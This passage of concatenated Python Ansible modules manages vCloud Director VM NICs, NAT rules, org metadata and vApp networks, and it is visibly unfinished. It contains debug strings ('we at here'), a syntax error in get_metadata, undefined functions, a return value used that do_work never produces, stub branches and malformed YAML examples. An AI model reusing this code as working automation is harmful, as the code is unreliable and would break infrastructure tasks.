'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'we_at_here': 'add_nic we_at_here'
}
response['changed'] = True
return response
def update_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
If network change is needed, add_update_nic is used
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
nic_indexs = [nic.NetworkConnectionIndex for nic in nics.NetworkConnection]
if nic_id not in nic_indexs:
response['warnings'] = 'NIC not found.'
return response
nic_to_update = nic_indexs.index(nic_id)
if network:
nics.NetworkConnection[nic_to_update].network = network
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_to_update].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
nics.NetworkConnection[nic_to_update].IpAddress = E.IpAddress(ip_address)
response['changed'] = True
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
response['msg'] = 'update_nid: vApp VM nic has been updated.'
return response
def read_nics(self):
vm = self.get_vm()
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
meta = defaultdict(dict)
nic_id = str(nic.NetworkConnectionIndex)
meta['MACAddress'] = str(nic.MACAddress)
meta['IsConnected'] = str(nic.IsConnected)
meta['NetworkAdapterType'] = str(nic.NetworkAdapterType)
meta['NetworkConnectionIndex'] = str(nic.NetworkConnectionIndex)
meta['IpAddressAllocationMode'] = str(nic.IpAddressAllocationMode)
meta['we at here 2'] = '2222222'
if hasattr(nic, 'IpAddress'):
meta['IpAddress'] = str(nic.IpAddress)
response['msg'][nic_id] = meta
return response
def delete_nic(self):
vm = self.get_vm()
nic_ids = self.params.get('nic_ids')
response = defaultdict(dict)
response['changed'] = False
uri = vm.resource.get('href') + '/networkConnectionSection'
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex in nic_ids:
nics.remove(nic)
nic_ids.remove(nic.NetworkConnectionIndex)
if len(nic_ids) > 0:
nic_ids = [str(nic_id) for nic_id in nic_ids]
err_msg = 'Can\'t find the specified VM nic(s) {0}'.format(','.join(nic_ids))
raise EntityNotFoundException(err_msg)
remove_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(remove_nic_task)
response['msg'] = 'VM nic(s) has been deleted.'
response['changed'] = True
return response
def main():
# org = "AIM"
# user = "cloud_robot_man_admin"
# password = "<PASSWORD>"
# host = "https://vcd.local.cloud.eve.vortice.eden/tenant/aim/"
# vm_name = "oz-router-01"
# vapp = "vZone_Sector_Network_Exchange_matreshka_zone_production_dc911rs"
# vdc = "lf-vx-z1e-vcd"
# network = "vZone_Sector_Network_Exchange_matreshka_routed_production_dc911rs"
# ip_allocation_mode = "DHCP"
# is_connected = True
# verify_ssl_certs = True
# api_version = '31.0'
# nic_id = "1"
# nic_ids = ["1", "0"]
# adapter_type = "E1000"
# state = "present"
# operation = "update"
argument_spec = vapp_vm_nic_argument_spec()
response = dict(
msg=dict(type='str')
)
module = VappVMNIC(argument_spec=argument_spec, supports_check_mode=True)
try:
if module.params.get('state'):
response = module.manage_states()
# if module.params.get('operation'):
# response = module.manage_operations()
else:
raise Exception('One of the state/operation should be provided.')
except Exception as error:
response['msg'] = error
module.fail_json(**response)
module.exit_json(**response)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_nat_fw.py
```python
DOCUMENTATION = '''
---
module: vcd_nat_fw
short_description: Update Nat/FW in vcloud
'''
EXAMPLES = '''
- name: Add nat rule
vcd_nat_fw:
vcloud_url: 'https://vcloud-url-goes-here.somecompany.com'
username: 'vcloud_admin'
passwd: '<PASSWORD>'
ruletype: 'DNAT'
iface: 'vm-blah-blah-blah'
ifaceguid: '57fe4def-5328-4e27-91aa-b73700bffaa1'
origip: 172.16.0.6
origport: any
transip: 192.168.2.0/24
transport: any
proto: tcp
'''
from ansible.module_utils.basic import *
import xml.etree.ElementTree as ET
import requests
import time
def do_work(data):
vc_url = data["vcloud_url"]
vc_usr = data["username"]
vc_pwd = data["<PASSWORD>"]
vc_gw_name = data['gw_name']
ruletype = data['ruletype']
nattype = data['nattype']
iface = data['iface']
ifaceguid = data['ifaceguid']
origip = data['origip']
origport = data['origport']
transip = data['transip']
transport = data['transport']
proto = data['proto']
headers = {
"Accept": "application/*+xml;version=1.5",
"User-Agent": "Mozilla/5.0"
}
if vc_url.endswith('/'):
vc_url = vc_url[:-1]
r = requests.post(vc_url + "/api/sessions", auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
headers['x-vcloud-authorization'] = r.headers['x-vcloud-authorization']
headers['Accept'] = 'application/*+xml;version=5.1'
r = requests.get(vc_url + '/api/query?type=edgeGateway', auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
tree = ET.fromstring(r.content)
# Get all gateways
gw_list = tree.findall('{http://www.vmware.com/vcloud/v1.5}EdgeGatewayRecord')
gw_href = ''
for gw in gw_list:
if gw.attrib['name'] == vc_gw_name:
gw_href = gw.attrib['href']
# GET https://vcloud/api/admin/edgeGateway/guid
r = requests.get(gw_href, auth=(vc_usr, vc_pwd), headers=headers)
if r.status_code == 200:
tree = ET.fromstring(r.content)
cfgtop = tree.findall('{http://www.vmware.com/vcloud/v1.5}Configuration')[0]
servicecfg = cfgtop.findall('{http://www.vmware.com/vcloud/v1.5}EdgeGatewayServiceConfiguration')[0]
natservice = servicecfg.findall('{http://www.vmware.com/vcloud/v1.5}NatService')[0]
fwservice = servicecfg.findall('{http://www.vmware.com/vcloud/v1.5}FirewallService')[0]
if ruletype == 'NAT':
# NatRule
newrule = ET.Element('NatRule')
newruletype = ET.SubElement(newrule, 'RuleType')
newruletype.text = nattype
newenabled = ET.SubElement(newrule, 'IsEnabled')
newenabled.text = 'true'
newid = ET.SubElement(newrule, 'Id')
newid.text = ''
newgwnatrule = ET.SubElement(newrule, 'GatewayNatRule')
newiface = ET.SubElement(newgwnatrule, 'Interface')
newiface.attrib['href'] = 'https://vcloud-/api/admin/network/' + ifaceguid
newiface.attrib['name'] = iface
newiface.attrib['type'] = 'application/vnd.vmware.admin.network+xml'
neworigip = ET.SubElement(newgwnatrule, 'OriginalIp')
neworigip.text = origip
neworigport = ET.SubElement(newgwnatrule, 'OriginalPort')
neworigport.text = origport
newtransip = ET.SubElement(newgwnatrule, 'TranslatedIp')
newtransip.text = transip
newtransport = ET.SubElement(newgwnatrule, 'TranslatedPort')
newtransport.text = transport
natservice.append(newrule)
#ET.dump(natservice)
headers["Content-Type"] = 'application/vnd.vmware.admin.edgeGatewayServiceConfiguration+xml'
r = requests.post(gw_href + '/action/configureServices', auth=(vc_usr, vc_pwd), headers=headers)
elif ruletype == 'FW':
pass
def main():
fields = {
"vcloud_url": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"passwd": {"required": True, "type": "str"},
"iface": {"required": True, "type": "str"},
"ifaceguid": {"required": True, "type": "str"},
"origip": {"required": True, "type": "str"},
"origport": {"required": True, "type": "str"},
"transip": {"required": True, "type": "str"},
"transport": {"required": True, "type": "str"},
"proto": {"required": True, "type": "str"},
"ruletype": {
"default": "SNAT",
"choices": ['SNAT', 'DNAT'],
"type": 'str'
},
}
choice_map = {
"yes": check_vm_block,
"no": do_work,
}
module = AnsibleModule(argument_spec=fields)
is_error, has_changed, result = do_work(module.params)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error checking vm state", meta=result)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_org_metadata.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_org_metadata
short_description: Manage org's states/operations in vCloud Director
version_added: "2.4"
description:
- Manage org's states/operations in vCloud Director
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
org_name:
description:
- name of the org
required: true
full_name:
description:
- full name of the org
required: false
is_enabled:
description:
- enable organization if True. The default value is False
required: false
force:
description:
- force delete org
required: false
recursive:
description:
- recursive delete org
required: false
metadata:
description:
- dict to set, delete or update metadata
required: false
state:
description: state of org (present/absent/update)
- One from state or operation has to be provided.
required: false
operation:
description:
- operation which should be performed over org
- One from state or operation has to be provided.
required: false
author:
- <EMAIL>
- <EMAIL>
- <EMAIL>
'''
EXAMPLES = '''
- name: "Set metadata of organization {{ org_name }}"
vcd_org_metadata:
user: XXXXXXXXXX
password: <PASSWORD>
host: XXXXXXXXXX
org: XXXXXXXXXX
org_name: "{{ org_name }}"
metadata:
- state: "present"
name: "keyX"
value: "valueY"
type: "STRING"
visibility: "READONLY"
#visibility: "READWRITE"
#visability: "PRIVATE"
operation: "set_metadata"
'''
RETURN = '''
msg: success/failure message corresponding to org state/operation
changed: true if resource has been changed else false
'''
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.system import System
from pyvcloud.vcd.client import EntityType, RelationType, ResourceType, MetadataDomain, MetadataVisibility, MetadataValueType
from pyvcloud.vcd.metadata import Metadata
from pyvcloud.vcd.utils import to_dict
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.exceptions import EntityNotFoundException, BadRequestException
VCD_ORG_STATES = ['present', 'absent', 'update']
VCD_ORG_OPERATIONS = ['read', 'add_rights', 'remove_rights', 'list_rights', 'list_roles', 'list_users', 'list_vdcs', 'set_metadata', 'get_metadata', 'get_metadata_key']
def org_argument_spec():
return dict(
org_name=dict(type='str', required=True),
full_name=dict(type='str', required=False),
is_enabled=dict(type='bool', required=False, default=False),
force=dict(type='bool', required=False, default=None),
recursive=dict(type='bool', required=False, default=None),
org_rights=dict(type='list', required=False),
metadata=dict(type='list', required=False, default='[]'),
state=dict(choices=VCD_ORG_STATES, required=False),
operation=dict(choices=VCD_ORG_OPERATIONS, required=False),
)
class VCDOrg(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VCDOrg, self).__init__(**kwargs)
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.create()
if state == "absent":
return self.delete()
if state == "update":
return self.update()
def manage_operations(self):
operation = self.params.get('operation')
if operation == "read":
return self.read()
if operation == "add_rights":
return self.add_rights()
if operation == "remove_rights":
return self.remove_rights()
if operation == "list_rights":
return self.list_rights()
if operation == "list_roles":
return self.list_roles()
if operation == "list_users":
return self.list_users()
if operation == "list_vdcs":
return self.list_vdcs()
if operation == "set_metadata":
return self.set_metadata()
if operation == "get_metadata":
return self.get_metadata()
if operation == "get_metadata_key":
return self.get_metadata_key()
def create(self):
org_name = self.params.get('org_name')
full_name = self.params.get('full_name')
is_enabled = self.params.get('is_enabled')
response = dict()
response['changed'] = False
try:
sys_admin = self.client.get_admin()
self.system = System(self.client, admin_resource=sys_admin)
self.system.create_org(org_name, full_name, is_enabled)
response['msg'] = 'Org {} has been created.'.format(org_name)
response['changed'] = True
except BadRequestException:
response['warnings'] = 'Org {} is already present.'.format(org_name)
return response
def read(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org_admin_resource = org.client.get_resource(org.href_admin)
org_details['org_name'] = org_name
org_details['full_name'] = str(org_admin_resource['FullName'])
org_details['is_enabled'] = str(org_admin_resource['IsEnabled'])
response['msg'] = org_details
return response
def update(self):
org_name = self.params.get('org_name')
is_enabled = self.params.get('is_enabled')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.update_org(is_enabled)
response['msg'] = "Org {} has been updated.".format(org_name)
response['changed'] = True
return response
def delete(self):
org_name = self.params.get('org_name')
force = self.params.get('force')
recursive = self.params.get('recursive')
response = dict()
response['changed'] = False
try:
sys_admin = self.client.get_admin()
self.system = System(self.client, admin_resource=sys_admin)
delete_org_task = self.system.delete_org(org_name, force, recursive)
self.execute_task(delete_org_task)
response['msg'] = "Org {} has been deleted.".format(org_name)
response['changed'] = True
except EntityNotFoundException:
response['warnings'] = "Org {} is not present.".format(org_name)
return response
def add_rights(self):
org_name = self.params.get('org_name')
org_rights = self.params.get('org_rights')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.add_rights(org_rights)
response['msg'] = "Rights has been added to org successfully."
response['changed'] = True
return response
def remove_rights(self):
org_name = self.params.get('org_name')
org_rights = self.params.get('org_rights')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org.remove_rights(org_rights)
response['msg'] = "Rights has been removed to org successfully."
response['changed'] = True
return response
def list_rights(self):
org_name = self.params.get('org_name')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['msg'] = org.list_rights_of_org()
return response
def list_roles(self):
org_name = self.params.get('org_name')
response = dict()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['msg'] = org.list_roles()
return response
def list_users(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['users'] = list()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
org_user_list = org.list_users()
resource_type = ResourceType.USER.value
if self.client.is_sysadmin():
resource_type = ResourceType.ADMIN_USER.value
for org_user in org_user_list:
response['users'].append(
to_dict(org_user, resource_type=resource_type, exclude=[]))
return response
def list_vdcs(self):
org_name = self.params.get('org_name')
response = dict()
org_details = dict()
response['vdcs'] = list()
response['changed'] = False
resource = self.client.get_org_by_name(org_name)
org = Org(self.client, resource=resource)
response['vdcs'] = org.list_vdcs()
return response
def get_metadata(self):
org_name = self.params.get('org_name')
metadata = self.params.get('metadata')
response = dict()
response['msg'] = ''
all_metadata = dict()
# self.metadata_visibility =
# self.metadata_domain =
if len(metadata) != 0:
# workaround to set metadata for org as it is as of now not implemented in pyvcloud for org, vdc, e.g. - we will open a pull request to fix this in the future
resource = self.client.get_linked_resource(self.client.get_org_by_name(org_name), RelationType.DOWN, EntityType.METADATA.value)
self.metadata = Metadata(self.client, resource=resource)
for md in metadata:
domain = MetadataDomain.SYSTEM
visibility = MetadataVisibility.READONLY
if type(md) is dict and md.get('state', 'present') == 'absent':
if md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
self.metadata.remove_metadata(md['name'], domain)
else:
if md.get('visibility', 'READONLY').upper() == 'PRIVATE':
visibility = MetadataVisibility.PRIVATE
elif md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
visibility = MetadataVisibility.READWRITE
value_type = MetadataValueType.STRING
if md.get('type', 'STRING').upper() == 'NUMBER':
value_type = MetadataValueType.NUMBER
elif md.get('type', 'STRING').upper() == 'BOOLEAN':
value_type = MetadataValueType.BOOLEAN
elif md.get('type', 'STRING').upper() == 'DATA_TIME':
value_type = MetadataValueType.DATA_TIME
self.metadata.get_metadata(md['name'], md['value'], domain, visibility, value_type, True)
all_metadata[md['name']].append(md))
return response
def set_metadata(self):
org_name = self.params.get('org_name')
metadata = self.params.get('metadata')
response = dict()
response['msg'] = ''
if len(metadata) != 0:
# workaround to set metadata for org as it is as of now not implemented in pyvcloud for org, vdc, e.g. - we will open a pull request to fix this in the future
resource = self.client.get_linked_resource(self.client.get_org_by_name(org_name), RelationType.DOWN, EntityType.METADATA.value)
self.metadata = Metadata(self.client, resource=resource)
for md in metadata:
domain = MetadataDomain.SYSTEM
visibility = MetadataVisibility.READONLY
if type(md) is dict and md.get('state', 'present') == 'absent':
if md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
self.metadata.remove_metadata(md['name'], domain)
else:
if md.get('visibility', 'READONLY').upper() == 'PRIVATE':
visibility = MetadataVisibility.PRIVATE
elif md.get('visibility', 'READONLY').upper() == 'READWRITE':
domain = MetadataDomain.GENERAL
visibility = MetadataVisibility.READWRITE
value_type = MetadataValueType.STRING
if md.get('type', 'STRING').upper() == 'NUMBER':
value_type = MetadataValueType.NUMBER
elif md.get('type', 'STRING').upper() == 'BOOLEAN':
value_type = MetadataValueType.BOOLEAN
elif md.get('type', 'STRING').upper() == 'DATA_TIME':
value_type = MetadataValueType.DATA_TIME
self.metadata.set_metadata(md['name'], md['value'], domain, visibility, value_type, True)
return response
def main():
argument_spec = org_argument_spec()
response = dict(msg=dict(type='str'))
module = VCDOrg(argument_spec=argument_spec, supports_check_mode=True)
try:
if module.check_mode:
response = dict()
response['changed'] = False
response['msg'] = "skipped, running in check mode"
response['skipped'] = True
elif module.params.get('state'):
response = module.manage_states()
elif module.params.get('operation'):
response = module.manage_operations()
else:
raise Exception('Please provide state/operation for resource')
except Exception as error:
response['msg'] = error
module.fail_json(**response)
else:
module.exit_json(**response)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_universal.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_v_network
short_description: Ansible Module to manage (create/delete) Networks in vApps in vCloud Director.
version_added: "2.4"
description:
- "Ansible Module to manage (create/delete) Networks in vApps."
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
network:
description:
- Network name
required: true
vapp:
description:
- vApp name
required: true
vdc:
description:
- VDC name
required: true
fence_mode:
description:
- Network fence mode
required: false
parent_network:
description:
- VDC parent network to connect to
required: false
ip_scope:
description:
- IP scope when no parent_network is defined
state:
description:
- state of network ('present'/'absent').
required: true
author:
- <EMAIL>
'''
EXAMPLES = '''
- name: Anything something
vcd_universal:
user: ""
password: ""
host: ""
org: ""
api_version: ""
verify_ssl_certs: true
network: ""
vapp: ""
vdc: ""
fence_mode: ""
parent_network:
ip_scope: ""
state: "read"
- name: Test with a message
vcd_universal:
user: terraform
password: <PASSWORD>
host: csa.sandbox.org
org: Terraform
api_version: 30
verify_ssl_certs: False
network = "uplink"
vapp = "vapp1"
vdc = "vdc1"
state = "present"
'''
RETURN = '''
msg: success/failure message corresponding to vapp network state
changed: true if resource has been changed else false
'''
from lxml import etree
from ipaddress import ip_network
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.client import E
from pyvcloud.vcd.vapp import VApp
from pyvcloud.vcd.client import NSMAP
from pyvcloud.vcd.client import E_OVF
from pyvcloud.vcd.client import FenceMode
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ApiVersion
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import E_OVF
from pyvcloud.vcd.client import EdgeGatewayType
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import FenceMode
from pyvcloud.vcd.client import find_link
from pyvcloud.vcd.client import GatewayBackingConfigType
from pyvcloud.vcd.client import LogicalNetworkLinkType
from pyvcloud.vcd.client import MetadataDomain
from pyvcloud.vcd.client import MetadataValueType
from pyvcloud.vcd.client import MetadataVisibility
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.client import SIZE_1MB
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.exceptions import EntityNotFoundException, OperationNotSupportedException
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
VAPP_VM_STATES = ['present', 'absent', 'read']
VAPP_VM_OPERATIONS = ['poweron', 'poweroff', 'deploy', 'undeploy', 'list_vms', 'list_networks']
VM_STATUSES = {'3': 'SUSPENDED', '4': 'POWERED_ON', '8': 'POWERED_OFF'}
VAPP_NETWORK_STATES = ['present', 'update', 'absent', 'read']
VAPP_NETWORK_OPERATIONS = ['read']
VAPP_TARGET_OBJECT = ['vapp', 'edge', 'vm', 'firewall']
def vapp_argument_spec():
return dict(
vapp_name=dict(type='str', required=True),
template_name=dict(type='str', required=False),
catalog_name=dict(type='str', required=False),
vdc=dict(type='str', required=True),
description=dict(type='str', required=False, default=None),
network=dict(type='str', required=False, default=None),
fence_mode=dict(
type='str', required=False, default=FenceMode.BRIDGED.value),
ip_allocation_mode=dict(type='str', required=False, default="dhcp"),
deploy=dict(type='bool', required=False, default=True),
power_on=dict(type='bool', required=False, default=True),
accept_all_eulas=dict(type='bool', required=False, default=False),
memory=dict(type='int', required=False, default=None),
cpu=dict(type='int', required=False, default=None),
disk_size=dict(type='int', required=False, default=None),
vmpassword=dict(type='str', required=False, default=None),
cust_script=dict(type='str', required=False, default=None),
vm_name=dict(type='str', required=False, default=None),
hostname=dict(type='str', required=False, default=None),
ip_address=dict(type='str', required=False, default=None),
storage_profile=dict(type='str', required=False, default=None),
network_adapter_type=dict(type='str', required=False, default=None),
force=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_STATES, required=False),
operation=dict(choices=VAPP_VM_OPERATIONS, required=False),
target=dict(choices=VAPP_TARGET_OBJECT, required=True)
)
def vapp_merge_argument_spec():
return dict(
vapp_name=dict(type='str', required=True),
template_name=dict(type='str', required=False),
catalog_name=dict(type='str', required=False),
vdc=dict(type='str', required=True),
description=dict(type='str', required=False, default=None),
network=dict(type='str', required=False, default=None),
fence_mode=dict(type='str', required=False, default=FenceMode.BRIDGED.value),
ip_allocation_mode=dict(type='str', required=False, default="dhcp"),
deploy=dict(type='bool', required=False, default=True),
power_on=dict(type='bool', required=False, default=True),
accept_all_eulas=dict(type='bool', required=False, default=False),
memory=dict(type='int', required=False, default=None),
cpu=dict(type='int', required=False, default=None),
disk_size=dict(type='int', required=False, default=None),
vmpassword=dict(type='str', required=False, default=None),
cust_script=dict(type='str', required=False, default=None),
vm_name=dict(type='str', required=False, default=None),
hostname=dict(type='str', required=False, default=None),
ip_address=dict(type='str', required=False, default=None),
parent_network=dict(type='str', required=False, default=None),
storage_profile=dict(type='str', required=False, default=None),
network_adapter_type=dict(type='str', required=False, default=None),
force=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_STATES, required=False),
ip_scope=dict(type='str', required=False, default=None),
operation=dict(choices=VAPP_VM_OPERATIONS, required=False),
target=dict(choices=VAPP_TARGET_OBJECT, required=False),
)
def vapp_network_argument_spec():
return dict(
network=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
fence_mode=dict(type='str', required=False, default=FenceMode.BRIDGED.value),
parent_network=dict(type='str', required=False, default=None),
ip_scope=dict(type='str', required=False, default=None),
state=dict(choices=VAPP_NETWORK_STATES, required=True),
)
class VappNetwork(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VappNetwork, self).__init__(**kwargs)
vapp_resource = self.get_resource()
self.vapp = VApp(self.client, resource=vapp_resource)
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.add_network()
if state == "absent":
return self.delete_network()
if state == "update":
return self.update_network()
if state == "read":
return self.read_network()
def get_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_org_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return org_resource
def get_vdc_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vdc_resource
def get_network(self):
network_name = self.params.get('network')
networks = self.vapp.get_all_networks()
for network in networks:
if network.get('{'+NSMAP['ovf']+'}name') == network_name:
return network
raise EntityNotFoundException('Can\'t find the specified vApp network')
def read_network(self):
network_name = self.params.get('network')
network_object = []
network_object = self.get_network(network_name)
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
finded_network = {}
org_resource = self.get_org_resource()
vdc_resource = self.get_vdc_resource()
vapp_resource = self.get_resource()
vnet_resource = self.get_network(self.NetworkConfig)
return network_object
def update_network(self):
network_name = self.n
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
finded_network = {}
org_resource = self.get_org_resource()
vdc_resource = self.get_vdc_resource()
vapp_resource = self.get_resource()
vnet_resource = self.get_network(self)
#self.get_vdc_resource.network_config_section
# for network in networks:
# if network.get('{'+NSMAP['ovf']+'}name') == network_name:
# net_entity = self.get_network(network_name)
# raise EntityNotFoundException('Can\'t find the specified vApp network')
#self.get_vdc_resource.network_config_section
# for network in networks:
# if network.get('{'+NSMAP['ovf']+'}name') == network_name:
# net_entity = self.get_network(network_name)
# raise EntityNotFoundException('Can\'t find the specified vApp network')
def delete_network(self):
network_name = self.params.get('network')
response = dict()
response['changed'] = False
try:
self.get_network()
except EntityNotFoundException:
response['warnings'] = 'Vapp Network {} is not present.'.format(network_name)
else:
network_config_section = self.vapp.resource.NetworkConfigSection
for network_config in network_config_section.NetworkConfig:
if network_config.get('networkName') == network_name:
network_config_section.remove(network_config)
delete_network_task = self.client.put_linked_resource(
self.vapp.resource.NetworkConfigSection, RelationType.EDIT,
EntityType.NETWORK_CONFIG_SECTION.value,
network_config_section)
self.execute_task(delete_network_task)
response['msg'] = 'Vapp Network {} has been deleted.'.format(network_name)
response['changed'] = True
return response
def add_network(self):
network_name = self.params.get('network')
fence_mode = self.params.get('fence_mode')
parent_network = self.params.get('parent_network')
ip_scope = self.params.get('ip_scope')
response = dict()
response['changed'] = False
try:
self.get_network()
except EntityNotFoundException:
network_config_section = self.vapp.resource.NetworkConfigSection
config = E.Configuration()
if parent_network:
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
orgvdc_networks = vdc_resource.list_orgvdc_network_resources(parent_network)
parent = next((network for network in orgvdc_networks if network.get('name') == parent_network), None)
if parent:
config.append(E.ParentNetwork(href=parent.get('href')))
else:
raise EntityNotFoundException('Parent network \'%s\' does not exist'.format(parent_network))
elif ip_scope:
scope = E.IpScope(
E.IsInherited('false'),
E.Gateway(str(ip_network(ip_scope, strict=False).network_address+1)),
E.Netmask(str(ip_network(ip_scope, strict=False).netmask)))
config.append(E.IpScopes(scope))
else:
raise VappNetworkCreateError('Either parent_network or ip_scope must be set')
config.append(E.FenceMode(fence_mode))
network_config = E.NetworkConfig(config, networkName=network_name)
network_config_section.append(network_config)
add_network_task = self.client.put_linked_resource(
self.vapp.resource.NetworkConfigSection, RelationType.EDIT,
EntityType.NETWORK_CONFIG_SECTION.value,
network_config_section)
self.execute_task(add_network_task)
response['msg'] = 'Vapp Network {} has been added'.format(network_name)
response['changed'] = True
else:
response['warnings'] = 'Vapp Network {} is already present.'.format(network_name)
return response
class Vapp(VcdAnsibleModule):
def __init__(self, **kwargs):
super(Vapp, self).__init__(**kwargs)
logged_in_org = self.client.get_org()
self.org = Org(self.client, resource=logged_in_org)
vdc_resource = self.org.get_vdc(self.params.get('vdc'))
self.vdc = VDC(self.client, href=vdc_resource.get('href'))
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.create()
if state == "absent":
return self.delete()
def manage_operations(self):
state = self.params.get('operation')
if state == "poweron":
return self.power_on()
if state == "poweroff":
return self.power_off()
if state == "deploy":
return self.deploy()
if state == "undeploy":
return self.undeploy()
if state == "list_vms":
return self.list_vms()
if state == "list_networks":
return self.list_networks()
def get_vapp(self):
vapp_name = self.params.get('vapp_name')
vapp_resource = self.vdc.get_vapp(vapp_name)
return VApp(self.client, name=vapp_name, resource=vapp_resource)
def instantiate(self):
params = self.params
vapp_name = params.get('vapp_name')
catalog_name = params.get('catalog_name')
template_name = params.get('template_name')
description = params.get('description')
network = params.get('network')
fence_mode = params.get('fence_mode')
ip_allocation_mode = params.get('ip_allocation_mode')
deploy = params.get('deploy')
power_on = params.get('power_on')
accept_all_eulas = params.get('accept_all_eulas')
memory = params.get('memory')
cpu = params.get('cpu')
disk_size = params.get('disk_size')
vmpassword = params.get('vmpassword')
cust_script = params.get('cust_script')
vm_name = params.get('vm_name')
hostname = params.get('hostname')
ip_address = params.get('ip_address')
storage_profile = params.get('storage_profile')
network_adapter_type = params.get('network_adapter_type')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
create_vapp_task = self.vdc.instantiate_vapp(
name=vapp_name,
catalog=catalog_name,
template=template_name,
description=description,
network=network,
fence_mode=fence_mode,
